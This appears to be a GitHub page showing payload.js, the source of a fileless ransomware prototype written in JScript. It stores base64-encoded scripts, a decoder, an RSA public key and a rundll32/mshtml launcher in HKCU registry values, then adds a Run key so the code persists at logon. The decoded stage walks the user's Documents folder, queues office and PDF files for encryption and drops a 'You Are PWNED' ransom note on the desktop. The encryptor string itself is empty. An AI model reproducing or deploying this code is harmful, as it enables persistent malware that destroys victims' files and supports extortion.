-
Notifications
You must be signed in to change notification settings - Fork 24
/
Copy pathpayload.js
18 lines (16 loc) · 48.2 KB
/
payload.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
var encryptor = "";
var fileReader = "dmFyIGJhc2U2ND17fTtiYXNlNjQuUEFEQ0hBUj0nPSc7YmFzZTY0LkFMUEhBPSdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJztiYXNlNjQubWFrZURPTUV4Y2VwdGlvbj1mdW5jdGlvbigpe3ZhciBlLHRtcDt0cnl7cmV0dXJuIG5ldyBET01FeGNlcHRpb24oRE9NRXhjZXB0aW9uLklOVkFMSURfQ0hBUkFDVEVSX0VSUil9Y2F0Y2godG1wKXt2YXIgZXg9bmV3IEVycm9yKCdET00gRXhjZXB0aW9uIDUnKTtleC5jb2RlPWV4Lm51bWJlcj01O2V4Lm5hbWU9ZXguZGVzY3JpcHRpb249J0lOVkFMSURfQ0hBUkFDVEVSX0VSUic7ZXgudG9TdHJpbmc9ZnVuY3Rpb24oKXtyZXR1cm4nRXJyb3I6ICcrZXgubmFtZSsnOiAnK2V4Lm1lc3NhZ2V9O3JldHVybiBleH19O2Jhc2U2NC5nZXRieXRlNjQ9ZnVuY3Rpb24ocyxpKXt2YXIgaWR4PWJhc2U2NC5BTFBIQS5pbmRleE9mKHMuY2hhckF0KGkpKTtpZihpZHg9PT0tMSl7dGhyb3cgYmFzZTY0Lm1ha2VET01FeGNlcHRpb24oKTt9cmV0dXJuIGlkeH07YmFzZTY0LmRlY29kZT1mdW5jdGlvbihzKXtzPScnK3M7dmFyIGdldGJ5dGU2ND1iYXNlNjQuZ2V0Ynl0ZTY0O3ZhciBwYWRzLGksYjEwO3ZhciBpbWF4PXMubGVuZ3RoO2lmKGltYXg9PT0wKXtyZXR1cm4gc31pZihpbWF4JTQhPT0wKXt0aHJvdyBiYXNlNjQubWFrZURPTUV4Y2VwdGlvbigpO31wYWRzPTA7aWYocy5jaGFyQXQoaW1heC0xKT09PWJhc2U2NC5QQURDSEFSKXtwYWRzPTE7aWYocy5jaGFyQXQoaW1heC0yKT09PWJhc2U2NC5QQURDSEFSKXtwYWRzPTJ9aW1heC09NH12YXIgeD1bXTtmb3IoaT0wO2k8aW1heDtpKz00KXtiMTA9KGdldGJ5dGU2NChzLGkpPDwxOCl8KGdldGJ5dGU2NChzLGkrMSk8PDEyKXwoZ2V0Ynl0ZTY0KHMsaSsyKTw8Nil8Z2V0Ynl0ZTY0KHMsaSszKTt4LnB1c2goU3RyaW5nLmZyb21DaGFyQ29kZShiMTA+PjE2LChiMTA+PjgpJjB4ZmYsYjEwJjB4ZmYpKX1zd2l0Y2gocGFkcyl7Y2FzZSAxOmIxMD0oZ2V0Ynl0ZTY0KHMsaSk8PDE4KXwoZ2V0Ynl0ZTY0KHMsaSsxKTw8MTIpfChnZXRieXRlNjQocyxpKzIpPDw2KTt4LnB1c2goU3RyaW5nLmZyb21DaGFyQ29kZShiMTA+PjE2LChiMTA+PjgpJjB4ZmYpKTticmVhaztjYXNlIDI6YjEwPShnZXRieXRlNjQocyxpKTw8MTgpfChnZXRieXRlNjQocyxpKzEpPDwxMik7eC5wdXNoKFN0cmluZy5mcm9tQ2hhckNvZGUoYjEwPj4xNikpO2JyZWFrfXJldHVybiB4LmpvaW4oJycpfTtiYXNlNjQuZ2V0Ynl0ZT1mdW5jdGlvbihzLGkpe3ZhciB4PXMuY2hhckNvZGVBdChpKTtpZih4PjI1NSl7dGhyb3cgYmFzZTY0Lm1ha2VET01FeGNlcHRpb24oKTt9cmV0dXJuIHh9O2Jhc2U2NC5lbmNvZGU9ZnVuY3Rpb24ocyl7aWYoYXJndW1lbnRzLmxlbmd0aCE9PTEpe3Rocm93IG5ldyBTeW50YXhFcnJvcignTm90IGVub3VnaCBhcmd1bWVudHMnKTt9dmFyIHBhZGNoYXI9YmFzZTY0LlBBRENIQVI7dmFyIGFscGhhPWJhc2U2NC5BTFBIQTt2YXIgZ2V0Ynl0ZT1iYXNlNjQuZ2V0Ynl0ZTt2YXIgaSxiMTA7dmFyIHg9W107cz0nJytzO3ZhciBpbWF4PXMubGVuZ3RoLXMubGVuZ3RoJTM7aWYocy5sZW5ndGg9PT0wKXtyZXR1cm4gc31mb3IoaT0wO2k8aW1heDtpKz0zKXtiMTA9KGdldGJ5dGUocyxpKTw8MTYpfChnZXRieXRlKHMsaSsxKTw8OCl8Z2V0Ynl0ZShzLGkrMik7eC5wdXNoKGFscGhhLmNoYXJBdChiMTA+PjE4KSk7eC5wdXNoKGFscGhhLmNoYXJBdCgoYjEwPj4xMikmMHgzRikpO3gucHVzaChhbHBoYS5jaGFyQXQoKGIxMD4+NikmMHgzZikpO3gucHVzaChhbHBoYS5jaGFyQXQoYjEwJjB4M2YpKX1zd2l0Y2gocy5sZW5ndGgtaW1heCl7Y2FzZSAxOmIxMD1nZXRieXRlKHMsaSk8PDE2O3gucHVzaChhbHBoYS5jaGFyQXQoYjEwPj4xOCkrYWxwaGEuY2hhckF0KChiMTA+PjEyKSYweDNGKStwYWRjaGFyK3BhZGNoYXIpO2JyZWFrO2Nhc2UgMjpiMTA9KGdldGJ5dGUocyxpKTw8MTYpfChnZXRieXRlKHMsaSsxKTw8OCk7eC5wdXNoKGFscGhhLmNoYXJBdChiMTA+PjE4KSthbHBoYS5jaGFyQXQoKGIxMD4+MTIpJjB4M0YpK2FscGhhLmNoYXJBdCgoYjEwPj42KSYweDNmKStwYWRjaGFyKTticmVha31yZXR1cm4geC5qb2luKCcnKX07dmFyIGVuY3J5cHRvcjt2YXIgcGVyc29uYWxGb2xkZXJSZWdpc3RyeUVudHJ5PSdIS0NVXFxTb2Z0d2FyZVxcTWljcm9zb2Z0XFxXaW5kb3dzXFxDdXJyZW50VmVyc2lvblxcRXhwbG9yZXJcXFNoZWxsIEZvbGRlcnNcXFBlcnNvbmFsJzt2YXIgZW5jcnlwdG9yUmVnaXN0cnlFbnRyeT0nSEtDVVxcU09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXGUnO3ZhciBmaWxlTmFtZVRvRW5jcnlwdFZhcj0nZmlsZU5hbWVUb0VuY3J5cHQnO3ZhciBwcm9jZXNzRmxhZ1JlZz0nSEtDVVxcU29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1blxcUFdORUQnO3ZhciBmc289bmV3IEFjdGl2ZVhPYmplY3QoJ1NjcmlwdGluZy5GaWxlU3lzdGVtT2JqZWN0Jyk7dmFyIGZpbGVFeHRMaXN0PXt0eHQ6J3R4dCcsZG9jOidkb2MnLGRvY3g6J2RvY3gnLHBkZjoncGRmJyx4bHM6J3hscycseGxzeDoneGxzeCcseGxzbToneGxzbSd9O3ZhciBwd25lZEZpbGVMaXN0PVtdO2Z1bmN0aW9uIGdldEZpbGVFeHQoZmlsZVNob3J0TmFtZSl7aWYoZmlsZVNob3J0TmFtZS5pbmRleE9mKCcuJyk+LTEpe3JldHVybiBmaWxlU2hvcnROYW1lLnNwbGl0KCcuJykucG9wKCkudG9Mb3dlckNhc2UoKX1lbHNle3JldHVybiBmYWxzZX19O2Z1bmN0aW9uIGlzVmFsaWRFeHQoZmlsZVNob3J0TmFtZSl7dmFyIGV4dD1nZXRGaWxlRXh0KGZpbGVTaG9ydE5hbWUpO3JldHVybiBleHQ/ZmlsZUV4dExpc3RbZXh0XTpmYWxzZX07ZnVuY3Rpb24gZ2V0RmlsZXMoZm9sZGVyUGF0aCl7dmFyIGZvbGRlcj1mc28uR2V0Rm9sZGVyKGZvbGRlclBhdGgpO3ZhciBmaWxlcz1mb2xkZXIuZmlsZXM7aWYoZmlsZXMuY291bnQ+MCl7dmFyIGZpbGVMaXN0PW5ldyBFbnVtZXJhdG9yKGZvbGRlci5maWxlcyk7Zm9yKDshZmlsZUxpc3QuYXRFbmQoKTtmaWxlTGlzdC5tb3ZlTmV4dCgpKXt0cnl7aWYoaXNWYWxpZEV4dChmaWxlTGlzdC5pdGVtKCkuU2hvcnROYW1lKSl7cHduZWRGaWxlTGlzdC5wdXNoKGZpbGVMaXN0Lml0ZW0oKS5wYXRoKTt2YXIgZXZhbFN0cmluZz0ndmFyICcrZmlsZU5hbWVUb0VuY3J5cHRWYXIrJyA9IFwnJytmaWxlTGlzdC5pdGVtKCkucGF0aC5yZXBsYWNlKC9cXC9nLCdcXFxcJykrJ1wnOycrZW5jcnlwdG9yO2V2YWwoZXZhbFN0cmluZyl9fWNhdGNoKGVycil7fX19fTtmdW5jdGlvbiBnZXRGb2xkZXJzKHBhdGgpe3ZhciBmb2xkZXI9ZnNvLkdldEZvbGRlcihwYXRoKTt2YXIgc3ViRm9sZGVycz1mb2xkZXIuU3ViRm9sZGVycztpZihzdWJGb2xkZXJzLmNvdW50PjApe3ZhciBmb2xkZXJMaXN0PW5ldyBFbnVtZXJhdG9yKHN1YkZvbGRlcnMpO2Zvcig7IWZvbGRlckxpc3QuYXRFbmQoKTtmb2xkZXJMaXN0Lm1vdmVOZXh0KCkpe3RyeXtnZXRGb2xkZXJzKGZvbGRlckxpc3QuaXRlbSgpKX1jYXRjaChlcnIpe319fWdldEZpbGVzKHBhdGgpfTtmdW5jdGlvbiBmaW5pc2goKXtpZihwd25lZEZpbGVMaXN0Lmxlbmd0aD4wKXt2YXIgd3NoPW5ldyBBY3RpdmVYT2JqZWN0KCdXU2NyaXB0LlNoZWxsJyk7dmFyIHBhdGg9d3NoLlJlZ1JlYWQoJ0hLQ1VcXFNvZnR3YXJlXFxNaWNyb3NvZnRcXFdpbmRvd3NcXEN1cnJlbnRWZXJzaW9uXFxFeHBsb3JlclxcU2hlbGwgRm9sZGVyc1xcRGVza3RvcCcpKydcXFlvdSBBcmUgUFdORUQuaHRtbCc7dmFyIGh0bWxCb2R5PSc8aHRtbD48aGVhZD48dGl0bGU+WW91IGhhdmUgYmVlbiBQV05FRCAhISEhISEhPC90aXRsZT48L2hlYWQ+PGJvZHk+PGgxPllvdSBIYXZlIGJlZW4gUFdORUQgYnkgTUUgISEhITwvaDE+PGgzPkZvbGxvd2luZyBmaWxlcyBhcmUgZW5jcnlwdGVkPC9oMz48cD4nK3B3bmVkRmlsZUxpc3Quam9pbignPGJyLz4nKSsnPC9wPjwvYm9keT48L2h0bWw+Jzt2YXIgYT1mc28uQ3JlYXRlVGV4dEZpbGUocGF0aCx0cnVlKTthLldyaXRlTGluZShodG1sQm9keSk7YS5DbG9zZSgpO3dzaC5SZWdXcml0ZShwcm9jZXNzRmxhZ1JlZyxwYXRoLCJSRUdfU1oiKX19O2Z1bmN0aW9uIGlzQWxlYXJkeVB3bmVkKCl7dHJ5e3ZhciB3c2g9bmV3IEFjdGl2ZVhPYmplY3QoJ1dTY3JpcHQuU2hlbGwnKTt2YXIgdmFsPXdzaC5SZWdSZWFkKHByb2Nlc3NGbGFnUmVnKTtyZXR1cm4gdmFsIT0nJ31jYXRjaChlcnIpe31yZXR1cm4gZmFsc2V9O2Z1bmN0aW9uIGdldERvY3VtZW50Rm9sZGVyKCl7aWYoaXNBbGVhcmR5UHduZWQoKT09ZmFsc2Upe3ZhciB3c2g9bmV3IEFjdGl2ZVhPYmplY3QoJ1dTY3JpcHQuU2hlbGwnKTt2YXIgcGF0aD13c2guUmVnUmVhZChwZXJzb25hbEZvbGRlclJlZ2lzdHJ5RW50cnkpO2VuY3J5cHRvcj1iYXNlNjQuZGVjb2RlKHdzaC5SZWdSZWFkKGVuY3J5cHRvclJlZ2lzdHJ5RW50cnkpKTtnZXRGb2xkZXJzKHBhdGgpO2ZpbmlzaCgpfX07Z2V0RG9jdW1lbnRGb2xkZXIoKTs=";
var decoder = "var base64={};base64.PADCHAR='=';base64.ALPHA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';base64.makeDOMException=function(){var e,tmp;try{return new DOMException(DOMException.INVALID_CHARACTER_ERR)}catch(tmp){var ex=new Error('DOM Exception 5');ex.code=ex.number=5;ex.name=ex.description='INVALID_CHARACTER_ERR';ex.toString=function(){return'Error: '+ex.name+': '+ex.message};return ex}};base64.getbyte64=function(s,i){var idx=base64.ALPHA.indexOf(s.charAt(i));if(idx===-1){throw base64.makeDOMException();}return idx};base64.decode=function(s){s=''+s;var getbyte64=base64.getbyte64;var pads,i,b10;var imax=s.length;if(imax===0){return s}if(imax%4!==0){throw base64.makeDOMException();}pads=0;if(s.charAt(imax-1)===base64.PADCHAR){pads=1;if(s.charAt(imax-2)===base64.PADCHAR){pads=2}imax-=4}var x=[];for(i=0;i<imax;i+=4){b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12)|(getbyte64(s,i+2)<<6)|getbyte64(s,i+3);x.push(String.fromCharCode(b10>>16,(b10>>8)&0xff,b10&0xff))}switch(pads){case 1:b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12)|(getbyte64(s,i+2)<<6);x.push(String.fromCharCode(b10>>16,(b10>>8)&0xff));break;case 2:b10=(getbyte64(s,i)<<18)|(getbyte64(s,i+1)<<12);x.push(String.fromCharCode(b10>>16));break}return x.join('')};base64.getbyte=function(s,i){var x=s.charCodeAt(i);if(x>255){throw base64.makeDOMException();}return x};base64.encode=function(s){if(arguments.length!==1){throw new SyntaxError('Not enough arguments');}var padchar=base64.PADCHAR;var alpha=base64.ALPHA;var getbyte=base64.getbyte;var i,b10;var x=[];s=''+s;var imax=s.length-s.length%3;if(s.length===0){return s}for(i=0;i<imax;i+=3){b10=(getbyte(s,i)<<16)|(getbyte(s,i+1)<<8)|getbyte(s,i+2);x.push(alpha.charAt(b10>>18));x.push(alpha.charAt((b10>>12)&0x3F));x.push(alpha.charAt((b10>>6)&0x3f));x.push(alpha.charAt(b10&0x3f))}switch(s.length-imax){case 1:b10=getbyte(s,i)<<16;x.push(alpha.charAt(b10>>18)+alpha.charAt((b10>>12)&0x3F)+padchar+padchar);break;case 2:b10=(getbyte(s,i)<<16)|(getbyte(s,i+1)<<8);x.push(alpha.charAt(b10>>18)+alpha.charAt((b10>>12)&0x3F)+alpha.charAt((b10>>6)&0x3f)+padchar);break}return x.join('')};var wsh = new ActiveXObject('WScript.Shell');eval(base64.decode(wsh.RegRead('HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\f')));";
var pk = "-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQD+APetzL8nI0xaCVbkootKhFuBVHMjsFyQANDvpNTz4v8Y8I24ePOnMrw/wR0fhs+KSKz2yrPuh5Bcq2B0wZhrFAgRSjhOe4v9oI2xlwCIIBVTqK4Sk0R25Wi9l+atUfTE5jDzSr7rPTiBKFOOA/AYAo5Q1bOPwt597m4tFk9quQIDAQAB-----END PUBLIC KEY-----";
var execute = 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write("\\74script language=jscript.encode>"+eval((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\d"))+"\\74/script>")';
var encryptorHive = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\e";
var fileReaderHive ="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\f";
var decoderHive ="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\d";
var pkHive = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\pk";
var executeRegHive = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\fileLessRw"
var wsh = new ActiveXObject("WScript.Shell");
wsh.RegWrite (encryptorHive, encryptor, "REG_SZ");
wsh.RegWrite (pkHive, pk, "REG_SZ");
wsh.RegWrite (fileReaderHive, fileReader, "REG_SZ");
wsh.RegWrite (decoderHive, decoder, "REG_SZ");
wsh.RegWrite (executeRegHive, execute, "REG_SZ");